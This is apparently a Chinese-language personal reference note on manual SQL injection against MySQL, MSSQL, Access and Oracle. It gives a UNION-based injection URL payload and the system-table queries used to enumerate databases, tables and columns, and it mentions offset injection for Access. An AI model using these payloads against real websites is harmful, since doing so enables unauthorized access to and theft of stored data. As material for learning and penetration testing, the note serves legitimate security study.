前言
发现MYSQL手注注入方式用得多了,几乎都快忘记其它数据库注入的方式了,这里不讲绕过姿势和写shell,毕竟网上很多前辈都给了方法,我只讲一些基本的注入方式(只是记录一下各自的特性,记下来方便以后参考回忆。)
MYSQL数据库
从5.0以后,就有information_schema自带库,通过它可以注入查询想要的数据
只有两个字段和单引号闭合的情况下
?id=1' and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()%23
tables 自带库中的一个表
table_name 是该表的一个字段名
%23 是#的url编码,#注释是MySQL特有的注释符,--注释是通用于大多数据库
key_column_usage、schemata、columns表等
通过它也能获取想要的数据,一般来说输出长度和数量都有限制,可以分页查询limit来读取数据
获取数据库名
获取表名
获取字段名
MSSQL数据库
一样的思路,判断是否存在注入,猜字段数,联合查询得到输出点,才开始查数据
需要注意的是:
1.联合查询时使用union all ,这点与MySQL有点区别的。
2.才输出点占位填充时,当不确定它每个位置的数据类型,使用NULL填充;否则数据类型要一一对应起来。
3.注释符就只有--
重点来了:
1.表master.dbo.sysdatabases(master系统库)
select name from master.dbo.sysdatabases
name为字段名,查询数据库名(没有database()函数)
2.表dbo.sysobjects
select name from dbo.sysobjects where xtype='U'
name为字段名,,查询表名(当前库下的dbo.sysobjects表记录着,U表示用户库,S表示系统库)
3.表dbo.syscolumns
select name from dbo.syscolumns where id=value
name为字段名,id为字段名(记录表的id),所以在查表名是应该查它的id,当要查字段名是要通过id查找,表名行不通的,查数据时才要用到表名
Access数据库
它并没有自带库,只能猜测表名的方式,获取数据
比如:and exists(select*from admin)
方法很多,不止一种
当get到表名后,而无法猜到字段名时,可以通过偏移注入方式获取数据;
同样,当其他类型数据库权限不够而无法查询通过查询自带库获取信息,可以通过这种偏移注入方法获取数据
Oracle数据库
接触这类型的很少,不熟悉
查数据库版本
select banner from sys.v_$version where rownum=1
查询表名
select table_name from user_tables where rownum=1
user_tables为当前用户的表
查字段名
select column_name from user_tab_columns where table_name=表名 and rownum=1
user_tab_columns当前用户的字段表
查第二个字段名
select column_name from user_tab_columns where table_name=表名 and column_name<>查到的第一个字段名 and rownum=1
oracle数据库可以参考https://www.freebuf.com/column/174974.html